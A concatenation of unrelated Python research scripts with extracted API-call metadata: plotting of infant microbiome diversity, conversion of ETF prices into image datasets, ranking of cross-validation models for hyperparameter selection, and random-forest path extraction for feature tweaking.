tp in infant_tps_ordered: num_samples = len(mi_tp_sample_dict['infant'][tp]) if num_samples < 10: continue # Skip timepoints with not enough data labels.append(tp + "\n" + ("n=%i" % num_samples)) alpha_divs_tp = [] common_pSs_tp = [] rare_pSs_tp = [] seg_pSs_tp = [] for sample in mi_tp_sample_dict['infant'][tp]: alpha_divs_tp.append(alpha_div_dict[sample]) common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]] rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]] seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]] alpha_divs.append(alpha_divs_tp) common_pSs.append(common_pSs_tp) rare_pSs.append(rare_pSs_tp) seg_pSs.append(seg_pSs_tp) num_qp_infant = np.array(num_qp_agg_species['infant']) num_non_infant = np.array(num_non_agg_species['infant']) qp_props_infant = num_qp_infant/(num_non_infant + num_qp_infant).astype('float') # one value for each tp num_qp_mother = np.array(num_qp_agg_species['mother']) num_non_mother = np.array(num_non_agg_species['mother']) qp_props_mother = num_qp_mother/(num_non_mother + num_qp_mother).astype('float') # one value for each tp ''' num_qp = np.array(num_qp_agg_species['mother'] + num_qp_agg_species['infant']) num_non = np.array(num_non_agg_species['mother'] + num_non_agg_species['infant']) qp_props = num_qp/(num_non + num_qp).astype('float') # one value for each tp ''' xticks = np.arange(len(labels)) fig, ax = plt.subplots(3, 1, figsize=(18, 12), sharex=True) fig.subplots_adjust(wspace=0.02, hspace=0.02) ax[0].boxplot(alpha_divs) ax[0].set_ylabel("Shannon alpha diversity\nper sample") ax[0].set_title("Alpha diversity, proportion of non-QP samples, polymorphism by timepoint (infants exclude Olm)") ax[0].axvline(5.5, color='gray', linestyle='-') # QP =================================================================== ax[1].plot(xticks[:5] + 1, 1-qp_props_mother, 'r.-') ax[1].plot(xticks[5:] + 1, 1-qp_props_infant, 'g.-') ax[1].set_ylabel("Prop. of high coverage samples\nwhich are non-QP") ax[1].axvline(5.5, color='gray', linestyle='-') ''' ax[1].boxplot(prop_nonqp_sample['mother'], positions=(xticks[:5] + 1)) ax[1].boxplot(prop_nonqp_sample['infant'], positions=(xticks[5:] + 1)) ax[1].set_ylabel("Prop. of high coverage species in a sample\nwhich are non-QP") ax[1].axvline(5.5, color='gray', linestyle='-') ''' # ====================================================================== bplot_s = ax[2].boxplot(seg_pSs, patch_artist=True, widths=0.16, positions=(xticks+0.75)) for patch in bplot_s['boxes']: patch.set_facecolor('pink') bplot_c = ax[2].boxplot(common_pSs, patch_artist=True, widths=0.16, positions=(xticks+1)) for patch in bplot_c['boxes']: patch.set_facecolor('lightblue') bplot_r = ax[2].boxplot(rare_pSs, patch_artist=True, widths=0.16, positions=(xticks+1.25)) for patch in bplot_r['boxes']: patch.set_facecolor('lightgreen') ax[2].set_yscale('log') ax[2].set_ylabel("Polymorphism (pS)\nper sample-species pair") ax[2].set_xlim((0, 24)) ax[2].set_xticks(xticks + 1) ax[2].set_xticklabels(labels, fontsize=11) ax[2].set_xlabel("Timepoint") ax[2].axvline(5.5, color='gray', linestyle='-') ax[1].legend([bp["boxes"][0] for bp in [bplot_s, bplot_c, bplot_r]], ['any (MAF >0)', 'common (MAF >0.2)', 'rare (MAF <0.05)'], loc='lower right') fig.savefig("%s/alpha_div-prop_qp-polymorphism_over_time_v3.pdf" % config.analysis_directory, bbox_inches='tight')
[ "utils.parse_midas_data.load_pickled_good_species_list", "collections.defaultdict", "numpy.array", "utils.sample_utils.get_mi_tp_sample_dict", "matplotlib.pyplot.subplots" ]
[((382, 431), 'utils.parse_midas_data.load_pickled_good_species_list', 'parse_midas_data.load_pickled_good_species_list', ([], {}), '()\n', (429, 431), False, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((1292, 1309), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1303, 1309), False, 'from collections import defaultdict\n'), ((1340, 1357), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1351, 1357), False, 'from collections import defaultdict\n'), ((1387, 1404), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1398, 1404), False, 'from collections import defaultdict\n'), ((3598, 3660), 'utils.sample_utils.get_mi_tp_sample_dict', 'su.get_mi_tp_sample_dict', ([], {'exclude_cohorts': "['olm']", 'binned': '(True)'}), "(exclude_cohorts=['olm'], binned=True)\n", (3622, 3660), True, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((8104, 8142), 'numpy.array', 'np.array', (["num_qp_agg_species['infant']"], {}), "(num_qp_agg_species['infant'])\n", (8112, 8142), True, 'import numpy as np\n'), ((8160, 8199), 'numpy.array', 'np.array', (["num_non_agg_species['infant']"], {}), "(num_non_agg_species['infant'])\n", (8168, 8199), True, 'import numpy as np\n'), ((8322, 8360), 'numpy.array', 'np.array', (["num_qp_agg_species['mother']"], {}), "(num_qp_agg_species['mother'])\n", (8330, 8360), True, 'import numpy as np\n'), ((8378, 8417), 'numpy.array', 'np.array', (["num_non_agg_species['mother']"], {}), "(num_non_agg_species['mother'])\n", (8386, 8417), True, 'import numpy as np\n'), ((8814, 8863), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', '(1)'], {'figsize': '(18, 12)', 'sharex': '(True)'}), '(3, 1, figsize=(18, 12), sharex=True)\n', (8826, 8863), True, 'from matplotlib import pyplot as plt\n'), ((4609, 4625), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4620, 4625), False, 'from collections import defaultdict\n'), ((4637, 4653), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4648, 4653), False, 'from collections import defaultdict\n'), ((4685, 4701), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4696, 4701), False, 'from collections import defaultdict\n'), ((4713, 4729), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4724, 4729), False, 'from collections import defaultdict\n')]
#!/usr/bin/env python3 # -*- coding: utf-8 -*- QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>' """ Created on Thu Oct 25 23:19:44 2018 @author: jeff """ '''************************************* #1. Import libraries and key varable values ''' import quandl import plotly import plotly.graph_objs as go import numpy as np from datetime import datetime try: import Image except ImportError: from PIL import Image import os import h5py #dates parameters str_dte = '2003-01-01' end_dte = '2018-7-31' date_dict = {'gte':str_dte, 'lte':end_dte} #quandl setting quandl.ApiConfig.api_key = QUANDLKEY col_num_mid = 10 col_num_dte = 9 #parameters for the image generation pixel_size = 100 window_size = 60 pred_window_size = 1 num_channel = 1 #create path for the output dataset folder_path = os.path.dirname(__file__) data_X_dir = os.path.join(folder_path,'dataset') data_Y_dir = os.path.join(folder_path,'dataset') #ticker lists #tkr_list = ['TIPX','HYMB','TFI','ULST','MBG','FLRN','SHM','STOT','SPTS','BIL','SPSB'] tkr_list = ['DWX','TIPX','FLRN','CBND','SJNK','SRLN','CJNK','DWFI','EMTL','STOT','TOTL','DIA','SMEZ','XITK','GLDM','GLD','XKFS','XKII','XKST','GLDW','SYE','SYG','SYV','LOWC','ZCAN','XINA','EFAX','QEFA','EEMX','QEMM','ZDEU','ZHOK','ZJPN','ZGBR','QUS','QWLD','OOO','LGLV','ONEV','ONEO','ONEY','SPSM','SMLV','MMTM','VLU','SPY','SPYX','SPYD','SPYB','WDIV','XWEB','MDY','NANR','XTH','SHE','GAL','INKM','RLY','ULST','BIL','CWB','EBND','JNK','ITE','IBND','BWX','SPTL','MBG','BWZ','IPE','WIP','RWO','RWX','RWR','FEZ','DGT','XNTK','CWI','ACIM','TFI','SHM','HYMB','SPAB','SPDW','SPEM','SPIB','SPLG','SPLB','SPMD','SPSB','SPTS','SPTM','MDYG','MDYV','SPYG','SPYV','SLY','SLYG','SLYV','KBE','KCE','GII','KIE','KRE','XAR','XBI','GXC','SDY','GMF','EDIV','EWX','GNR','XHE','XHS','XHB','GWX','XME','XES','XOP','XPH','XRT','XSD','XSW','XTL','XTN','FEU','PSK'] #generate png file for each of the input or now img_output =False #generate interactive plot to the ticket stock price or not gen_plot = False '''************************************* #2. Define the function to rescale the stock price according to the min and max values ''' #input_X is a series of price #output_X is a series of price expressed in pixel def rescale(input_X, pixel, min_x,max_x): unit = (max_x - min_x)/pixel output_X = round((input_X-min_x)/unit,0) return output_X,unit '''************************************* #3. Go through the tickers ''' for tkr in tkr_list: print(tkr) #if the ticker has been downloaded, skip the ticket and go for the next one if os.path.exists(tkr+'6b1_completed.txt'): continue #download and create dataset df =quandl.get_table('SHARADAR/SFP',date=date_dict,ticker=tkr) #sort the date from ascending to descending... df = df.sort_values(by=['date']) df=df.reset_index(drop=True) #charting interactive chart for viewing the data if gen_plot == True: trace = go.Candlestick(x=df.date, open=df.open, high=df.high, low=df.low, close=df.close) data = [trace] plotly.offline.plot(data, filename=tkr+'simple_candlestick') #calculate mid price of the day df['mid'] = (df['high'] + df['low'])/2 len_df = len(df) num_img = max(int(len_df-window_size-1),0) current_min_dte = df.date train_shape = (num_img, pixel_size, window_size,num_channel) label_shape = (num_img, pixel_size) #remove the file if there is one data_X_path = os.path.join(data_X_dir,tkr+'X_img.h5') try: os.remove(data_X_path) except OSError: pass h5f_X = h5py.File(data_X_path,'w') #remove the file if there is one data_Y_path = os.path.join(data_Y_dir,tkr+'Y_label.h5') try: os.remove(data_Y_path) except OSError: pass h5f_Y = h5py.File(data_Y_path,'w') #create dataset within the HDF5 file #now we create the dataset with a fixed size to fit all the data, it could also be create to fit fixed batches h5f_X.create_dataset("X_img_ds", train_shape, np.float32) h5f_Y.create_dataset("Y_label_ds", label_shape, np.float32) #loop through the dates for i in range(num_img): img_ar = np.zeros((pixel_size,window_size,1)) result_Y =np.zeros((pixel_size)) df_plot = df.iloc[i:window_size+i,:] #create min and max values for the mid price plot within a given timeframe min_p = min(df_plot['mid']) max_p = max(df_plot['mid']) output_pixel,unit = rescale(df_plot['mid'],pixel_size,min_p,max_p) df_next = df.iloc[window_size+i+1,:] next_p = df_next['mid'] unit = max(unit,0.000001) next_p_val = max(round((min(next_p,max_p)-min_p)/unit,0),0) #in case of low liquidity ETF which has the same price, no graph be drawn if min_p ==max_p: continue k = 0 #draw the dot on the x, y axis of the input image array for pix in output_pixel: img_ar[int(pix)-1][k][0] = 255 k+=1 #output the image for visualization if img_output: img = Image.fromarray(img_ar) if img.mode != 'RGB': new_img = img.convert('RGB') file_path = os.path.join(folder_path,'img/'+tkr+str(i)+'.png') new_img.save(file_path,"PNG") img_row = img_ar/255 #draw the dot on the target image for training result_Y[int(next_p_val)-1] = 255 result_Y_row=result_Y/255 #stack up for a numpy for Image Recognition h5f_X["X_img_ds"][i, ...] = img_row h5f_Y["Y_label_ds"][i, ...] = result_Y_row if i == 0: np_X = img_row np_Y = result_Y_row else: np_X = np.vstack((np_X,img_row)) np_Y = np.vstack((np_Y,result_Y_row)) f_tkr=open(tkr+'6b1_completed.txt','w+') f_tkr.close() h5f_X.close() h5f_Y.close() #generate the message to the directory to signal the completion of this task f=open('6b1_completed.txt','w+') f.close()
[ "h5py.File", "os.remove", "os.path.dirname", "os.path.exists", "numpy.zeros", "plotly.offline.plot", "quandl.get_table", "plotly.graph_objs.Candlestick", "PIL.Image.fromarray", "os.path.join", "numpy.vstack" ]
[((791, 816), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (806, 816), False, 'import os\n'), ((830, 866), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (842, 866), False, 'import os\n'), ((879, 915), 'os.path.join', 'os.path.join', (['folder_path', '"""dataset"""'], {}), "(folder_path, 'dataset')\n", (891, 915), False, 'import os\n'), ((2563, 2604), 'os.path.exists', 'os.path.exists', (["(tkr + '6b1_completed.txt')"], {}), "(tkr + '6b1_completed.txt')\n", (2577, 2604), False, 'import os\n'), ((2667, 2727), 'quandl.get_table', 'quandl.get_table', (['"""SHARADAR/SFP"""'], {'date': 'date_dict', 'ticker': 'tkr'}), "('SHARADAR/SFP', date=date_dict, ticker=tkr)\n", (2683, 2727), False, 'import quandl\n'), ((3593, 3635), 'os.path.join', 'os.path.join', (['data_X_dir', "(tkr + 'X_img.h5')"], {}), "(data_X_dir, tkr + 'X_img.h5')\n", (3605, 3635), False, 'import os\n'), ((3718, 3745), 'h5py.File', 'h5py.File', (['data_X_path', '"""w"""'], {}), "(data_X_path, 'w')\n", (3727, 3745), False, 'import h5py\n'), ((3801, 3845), 'os.path.join', 'os.path.join', (['data_Y_dir', "(tkr + 'Y_label.h5')"], {}), "(data_Y_dir, tkr + 'Y_label.h5')\n", (3813, 3845), False, 'import os\n'), ((3928, 3955), 'h5py.File', 'h5py.File', (['data_Y_path', '"""w"""'], {}), "(data_Y_path, 'w')\n", (3937, 3955), False, 'import h5py\n'), ((2946, 3032), 'plotly.graph_objs.Candlestick', 'go.Candlestick', ([], {'x': 'df.date', 'open': 'df.open', 'high': 'df.high', 'low': 'df.low', 'close': 'df.close'}), '(x=df.date, open=df.open, high=df.high, low=df.low, close=df.\n close)\n', (2960, 3032), True, 'import plotly.graph_objs as go\n'), ((3184, 3246), 'plotly.offline.plot', 'plotly.offline.plot', (['data'], {'filename': "(tkr + 'simple_candlestick')"}), "(data, filename=tkr + 'simple_candlestick')\n", (3203, 3246), False, 'import plotly\n'), ((3650, 3672), 'os.remove', 'os.remove', (['data_X_path'], {}), '(data_X_path)\n', (3659, 3672), False, 'import os\n'), ((3860, 3882), 'os.remove', 'os.remove', (['data_Y_path'], {}), '(data_Y_path)\n', (3869, 3882), False, 'import os\n'), ((4325, 4363), 'numpy.zeros', 'np.zeros', (['(pixel_size, window_size, 1)'], {}), '((pixel_size, window_size, 1))\n', (4333, 4363), True, 'import numpy as np\n'), ((4380, 4400), 'numpy.zeros', 'np.zeros', (['pixel_size'], {}), '(pixel_size)\n', (4388, 4400), True, 'import numpy as np\n'), ((5262, 5285), 'PIL.Image.fromarray', 'Image.fromarray', (['img_ar'], {}), '(img_ar)\n', (5277, 5285), False, 'from PIL import Image\n'), ((5947, 5973), 'numpy.vstack', 'np.vstack', (['(np_X, img_row)'], {}), '((np_X, img_row))\n', (5956, 5973), True, 'import numpy as np\n'), ((5992, 6023), 'numpy.vstack', 'np.vstack', (['(np_Y, result_Y_row)'], {}), '((np_Y, result_Y_row))\n', (6001, 6023), True, 'import numpy as np\n')]
# PACKAGES import numpy as np import os from scipy import stats as ss import pickle import h5py import pandas as pd from configs import * path_to_results_folder = "%sresults/"%CV_save_path path_to_preds_folder = "%spredictions/"%CV_save_path path_to_final_chosen_models = "%sfinal_models_chosen/"%CV_save_path if not os.path.isdir(path_to_final_chosen_models): os.makedirs(path_to_final_chosen_models) #### Compute test set variances variances = {} tmp_fname = os.listdir(path_to_preds_folder + "MTL/" + split_pca_dataset + "/")[0] for variable in phenotypes: vars_by_split = [] for fold_idx in range(25,30): path_to_preds = path_to_preds_folder + "MTL/%s/%s/%d.h5"%(split_pca_dataset, tmp_fname, fold_idx) with h5py.File(path_to_preds, 'r') as hf: true_vals = hf["y_true"][variable][:] vars_by_split.append(np.nanvar(true_vals)) variances[variable] = np.array(vars_by_split) def MTL_get_CV_test_res_as_df(path_to_log_files): firstfile = os.listdir(path_to_log_files)[0] cols = pd.read_csv(path_to_log_files + firstfile).columns test_runs = [] for i in range(5): # the first 25 files are CV folds cur_idx = 25+i test_runs.append(pd.read_csv(path_to_log_files + "%d.log"%cur_idx)) test_overall_averages = pd.DataFrame(np.nanmean(np.array([test_runs[i].values for i in range(5)]),axis=0), columns=cols) return test_runs, test_overall_averages ################################################# ############### MD-AD ########################## ################################################# performances = {} for var in phenotypes: performances[var] = {} for fname in os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset): test_runs, test_overall_avergaes = MTL_get_CV_test_res_as_df(path_to_results_folder + "MTL/" + split_pca_dataset + "/" + fname + "/") performances[var][fname] = [] for foldidx in range(5): # we want the min loss, and we scale by variance test_var = variances[var][foldidx] performances[var][fname].append(np.min(test_runs[foldidx]["val_%s_out_loss"%var])/test_var) fnames = os.listdir(path_to_results_folder + "MTL/" + split_pca_dataset) num_hy = len(fnames) ############ Choose final model within each CV split ################## FOLD_performances = {} for fold_idx in range(5): FOLD_performances[fold_idx] = {} for key1 in performances.keys(): FOLD_performances[fold_idx][key1] = [] for key2 in performances[key1].keys(): FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx]) FOLD_rankings = {} for fold_idx in range(5): FOLD_rankings[fold_idx] = {} for phenotype in FOLD_performances[fold_idx].keys(): if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0: FOLD_rankings[fold_idx][phenotype] = np.zeros(num_hy) continue FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype]) FOLD_sum_of_ranks = {} for fold_idx in range(5): FOLD_sum_of_ranks[fold_idx] = np.zeros(num_hy) for phenotype in FOLD_rankings[fold_idx].keys(): FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype] final_models_dict = {} for fold_idx in range(5): final_models_dict[25+fold_idx] = fnames[np.argmin(FOLD_sum_of_ranks[fold_idx])] if not os.path.isdir(path_to_final_chosen_models + "MTL/"): os.makedirs(path_to_final_chosen_models + "MTL/") pickle.dump(final_models_dict, open( path_to_final_chosen_models+"MTL/folds.p", "wb" ) ) ############ Choose final model overall (for retraining with all data) ################## AVG_performances = {} for key1 in performances.keys(): AVG_performances[key1] = {} for key2 in performances[key1].keys(): AVG_performances[key1][key2] = np.nanmean(performances[key1][key2]) fnames_performances = {} for phenotype in AVG_performances.keys(): fnames_performances[phenotype] = [] for fname in fnames: fnames_performances[phenotype].append(AVG_performances[phenotype][fname]) fnames_rankings = {} for phenotype in fnames_performances.keys(): fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype]) sum_of_ranks = np.zeros(len(fnames)) for phenotype in fnames_rankings.keys(): sum_of_ranks += fnames_rankings[phenotype] pickle.dump(fnames[np.argmin(sum_of_ranks)], open( path_to_final_chosen_models+"MTL/final.p", "wb" ) ) ################################################# ################ MLPs ########################## ################################################# performances = {} for var in phenotypes: performances[var] = {} for fname in os.listdir(path_to_results_folder + "MLP_baselines/" + split_pca_dataset): test_runs, test_overall_avergaes = MTL_get_CV_test_res_as_df("%sMLP_baselines/%s/%s/%s/"%(path_to_results_folder,split_pca_dataset, fname,var)) performances[var][fname] = [] for foldidx in range(5): # we want the min loss, and we scale by variance test_performance = np.min(test_runs[foldidx]["val_loss"])/variances[var][foldidx] performances[var][fname].append(test_performance) ############ Choose final model within each CV split ################## FOLD_performances = {} for fold_idx in range(5): FOLD_performances[fold_idx] = {} for key1 in performances.keys(): FOLD_performances[fold_idx][key1] = [] for key2 in performances[key1].keys(): FOLD_performances[fold_idx][key1].append(performances[key1][key2][fold_idx]) FOLD_rankings = {} for fold_idx in range(5): FOLD_rankings[fold_idx] = {} for phenotype in FOLD_performances[fold_idx].keys(): if np.sum(~np.isnan(FOLD_performances[fold_idx][phenotype])) == 0: FOLD_rankings[fold_idx][phenotype] = np.zeros(len(fnames)) continue FOLD_rankings[fold_idx][phenotype] = ss.rankdata(FOLD_performances[fold_idx][phenotype]) final_models = {} for fold_idx in range(5): final_models[25+fold_idx] = {} for phenotype in FOLD_rankings[fold_idx].keys(): final_models[25+fold_idx][phenotype] = fnames[np.argmin(FOLD_rankings[fold_idx][phenotype])] if not os.path.isdir(path_to_final_chosen_models + "MLP_baselines/"): os.makedirs(path_to_final_chosen_models + "MLP_baselines/") pickle.dump(final_models, open( path_to_final_chosen_models+"MLP_baselines/folds.p", "wb" ) ) ############ Choose final model overall (for retraining with all data) ################## FOLD_sum_of_ranks = {} for fold_idx in range(5): FOLD_sum_of_ranks[fold_idx] = np.zeros(len(fnames)) for phenotype in FOLD_rankings[fold_idx].keys(): FOLD_sum_of_ranks[fold_idx] += FOLD_rankings[fold_idx][phenotype] AVG_performances = {} for key1 in performances.keys(): AVG_performances[key1] = {} for key2 in performances[key1].keys(): AVG_performances[key1][key2] = np.nanmean(performances[key1][key2]) fnames_performances = {} for phenotype in AVG_performances.keys(): fnames_performances[phenotype] = [] for fname in fnames: fnames_performances[phenotype].append(AVG_performances[phenotype][fname]) fnames_rankings = {} for phenotype in fnames_performances.keys(): fnames_rankings[phenotype] = ss.rankdata(fnames_performances[phenotype]) final_final_mlp_baselines = {} for phenotype in fnames_rankings.keys(): final_final_mlp_baselines[phenotype]= fnames[np.argmin(fnames_rankings[phenotype])] pickle.dump(final_final_mlp_baselines, open( path_to_final_chosen_models+"MLP_baselines/final.p", "wb" ) ) print("Saved selected hyperparameters to folder: %s"%path_to_final_chosen_models)
[ "h5py.File", "os.makedirs", "os.path.isdir", "pandas.read_csv", "numpy.zeros", "scipy.stats.rankdata", "numpy.argmin", "numpy.isnan", "numpy.min", "numpy.array", "numpy.nanvar", "os.listdir", "numpy.nanmean" ]
[((2245, 2308), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (2255, 2308), False, 'import os\n'), ((324, 366), 'os.path.isdir', 'os.path.isdir', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (337, 366), False, 'import os\n'), ((372, 412), 'os.makedirs', 'os.makedirs', (['path_to_final_chosen_models'], {}), '(path_to_final_chosen_models)\n', (383, 412), False, 'import os\n'), ((484, 551), 'os.listdir', 'os.listdir', (["(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')"], {}), "(path_to_preds_folder + 'MTL/' + split_pca_dataset + '/')\n", (494, 551), False, 'import os\n'), ((928, 951), 'numpy.array', 'np.array', (['vars_by_split'], {}), '(vars_by_split)\n', (936, 951), True, 'import numpy as np\n'), ((1718, 1781), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MTL/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MTL/' + split_pca_dataset)\n", (1728, 1781), False, 'import os\n'), ((3238, 3254), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3246, 3254), True, 'import numpy as np\n'), ((3538, 3589), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3551, 3589), False, 'import os\n'), ((3595, 3644), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MTL/')"], {}), "(path_to_final_chosen_models + 'MTL/')\n", (3606, 3644), False, 'import os\n'), ((4351, 4394), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (4362, 4394), True, 'from scipy import stats as ss\n'), ((4876, 4949), 'os.listdir', 'os.listdir', (["(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)"], {}), "(path_to_results_folder + 'MLP_baselines/' + split_pca_dataset)\n", (4886, 4949), False, 'import os\n'), ((6479, 6540), 'os.path.isdir', 'os.path.isdir', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6492, 6540), False, 'import os\n'), ((6546, 6605), 'os.makedirs', 'os.makedirs', (["(path_to_final_chosen_models + 'MLP_baselines/')"], {}), "(path_to_final_chosen_models + 'MLP_baselines/')\n", (6557, 6605), False, 'import os\n'), ((7589, 7632), 'scipy.stats.rankdata', 'ss.rankdata', (['fnames_performances[phenotype]'], {}), '(fnames_performances[phenotype])\n', (7600, 7632), True, 'from scipy import stats as ss\n'), ((1029, 1058), 'os.listdir', 'os.listdir', (['path_to_log_files'], {}), '(path_to_log_files)\n', (1039, 1058), False, 'import os\n'), ((1073, 1115), 'pandas.read_csv', 'pd.read_csv', (['(path_to_log_files + firstfile)'], {}), '(path_to_log_files + firstfile)\n', (1084, 1115), True, 'import pandas as pd\n'), ((3093, 3144), 'scipy.stats.rankdata', 'ss.rankdata', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (3104, 3144), True, 'from scipy import stats as ss\n'), ((3481, 3519), 'numpy.argmin', 'np.argmin', (['FOLD_sum_of_ranks[fold_idx]'], {}), '(FOLD_sum_of_ranks[fold_idx])\n', (3490, 3519), True, 'import numpy as np\n'), ((3999, 4035), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (4009, 4035), True, 'import numpy as np\n'), ((4549, 4572), 'numpy.argmin', 'np.argmin', (['sum_of_ranks'], {}), '(sum_of_ranks)\n', (4558, 4572), True, 'import numpy as np\n'), ((6185, 6236), 'scipy.stats.rankdata', 'ss.rankdata', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (6196, 6236), True, 'from scipy import stats as ss\n'), ((7229, 7265), 'numpy.nanmean', 'np.nanmean', (['performances[key1][key2]'], {}), '(performances[key1][key2])\n', (7239, 7265), True, 'import numpy as np\n'), ((7759, 7796), 'numpy.argmin', 'np.argmin', (['fnames_rankings[phenotype]'], {}), '(fnames_rankings[phenotype])\n', (7768, 7796), True, 'import numpy as np\n'), ((759, 788), 'h5py.File', 'h5py.File', (['path_to_preds', '"""r"""'], {}), "(path_to_preds, 'r')\n", (768, 788), False, 'import h5py\n'), ((876, 896), 'numpy.nanvar', 'np.nanvar', (['true_vals'], {}), '(true_vals)\n', (885, 896), True, 'import numpy as np\n'), ((1257, 1308), 'pandas.read_csv', 'pd.read_csv', (["(path_to_log_files + '%d.log' % cur_idx)"], {}), "(path_to_log_files + '%d.log' % cur_idx)\n", (1268, 1308), True, 'import pandas as pd\n'), ((3001, 3017), 'numpy.zeros', 'np.zeros', (['num_hy'], {}), '(num_hy)\n', (3009, 3017), True, 'import numpy as np\n'), ((6424, 6469), 'numpy.argmin', 'np.argmin', (['FOLD_rankings[fold_idx][phenotype]'], {}), '(FOLD_rankings[fold_idx][phenotype])\n', (6433, 6469), True, 'import numpy as np\n'), ((5267, 5305), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_loss']"], {}), "(test_runs[foldidx]['val_loss'])\n", (5273, 5305), True, 'import numpy as np\n'), ((2149, 2200), 'numpy.min', 'np.min', (["test_runs[foldidx]['val_%s_out_loss' % var]"], {}), "(test_runs[foldidx]['val_%s_out_loss' % var])\n", (2155, 2200), True, 'import numpy as np\n'), ((2896, 2944), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (2904, 2944), True, 'import numpy as np\n'), ((5983, 6031), 'numpy.isnan', 'np.isnan', (['FOLD_performances[fold_idx][phenotype]'], {}), '(FOLD_performances[fold_idx][phenotype])\n', (5991, 6031), True, 'import numpy as np\n')]
import numpy as np import pandas as pd import copy import scipy.stats from sklearn.metrics import mean_squared_error from sklearn.ensemble import RandomForestRegressor """ define basic functions for AFT1 """ def search_path(estimator, y_threshold): """ return path index list containing [{leaf node id, inequality symbol, threshold, feature index}]. estimator: decision tree maxj: the number of selected leaf nodes """ """ select leaf nodes whose outcome is aim_label """ # information of left child node children_left = estimator.tree_.children_left children_right = estimator.tree_.children_right feature = estimator.tree_.feature threshold = estimator.tree_.threshold # leaf nodes ID leaf_nodes = np.where(children_left == -1)[0] leaf_nodes = [ i for i in leaf_nodes if estimator.tree_.value[i] >= y_threshold] """ search the path to the selected leaf node """ paths = {} for leaf_node in leaf_nodes: """ correspond leaf node to left and right parents """ child_node = leaf_node parent_node = -100 # initialize parents_left = [] # 左側親ノード parents_right = [] # 右側親ノード while (parent_node != 0): if (np.where(children_left == child_node)[0].shape == (0, )): parent_left = -1 # 左側親ノードが存在しない場合は-1 parent_right = np.where( children_right == child_node)[0][0] parent_node = parent_right elif (np.where(children_right == child_node)[0].shape == (0, )): parent_right = -1 # 右側親ノードが存在しない場合は-1 parent_left = np.where(children_left == child_node)[0][0] parent_node = parent_left parents_left.append(parent_left) parents_right.append(parent_right) """ for next step """ child_node = parent_node # nodes dictionary containing left parents and right parents paths[leaf_node] = (parents_left, parents_right) path_info = {} for i in paths: node_ids = [] # node ids used in the current node # inequality symbols used in the current node inequality_symbols = [] thresholds = [] # thretholds used in the current node features = [] # features used in the current node parents_left, parents_right = paths[i] for idx in range(len(parents_left)): if (parents_left[idx] != -1): """ the child node is the left child of the parent """ node_id = parents_left[idx] # node id node_ids.append(node_id) inequality_symbols.append(0) thresholds.append(threshold[node_id]) features.append(feature[node_id]) elif (parents_right[idx] != -1): """ the child node is the right child of the parent """ node_id = parents_right[idx] node_ids.append(node_id) inequality_symbols.append(1) thresholds.append(threshold[node_id]) features.append(feature[node_id]) path_info[i] = {'node_id': node_ids[::-1], 'inequality_symbol': inequality_symbols[::-1], 'threshold': thresholds[::-1], 'feature': features[::-1]} return path_info def esatisfactory_instance(x, epsilon, path_info): """ return the epsilon satisfactory instance of x. """ esatisfactory = copy.deepcopy(x) for feature_idx in np.unique(path_info['feature']): """ loop by each feature -- i is feature index (feature name). """ positions = np.where(np.array(path_info['feature'])==feature_idx)[0] # positions of path_information list theta_upp = float('inf') theta_low = -float('inf') for posi in positions: if path_info['inequality_symbol'][posi]==0: """ posiが大きいほど厳しい条件になるので,順番に更新していくだけで良い """ theta_upp = path_info['threshold'][posi] # upper bounded threshold elif path_info['inequality_symbol'][posi]==1: theta_low = path_info['threshold'][posi] # lower bounded threshold if theta_low == -float('inf'): esatisfactory[feature_idx] = theta_upp - epsilon elif theta_upp == float('inf'): esatisfactory[feature_idx] = theta_low + epsilon else: esatisfactory[feature_idx] = (theta_low + theta_upp)/2 